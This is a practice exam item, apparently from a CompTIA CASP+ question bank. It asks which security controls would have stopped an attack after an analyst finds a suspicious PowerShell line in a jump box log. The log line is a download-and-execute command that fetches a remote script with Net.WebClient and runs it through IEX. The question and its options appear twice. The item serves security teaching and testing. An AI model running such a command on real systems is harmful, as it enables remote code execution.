A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file:
powershell "IEX(New-Object Net.WebClient).DownloadString (`https://content.comptia.org/casp/whois.psl');whois"
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
powershell "IEX(New-Object Net.WebClient).DownloadString (`https://content.comptia.org/casp/whois.psl');whois"
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA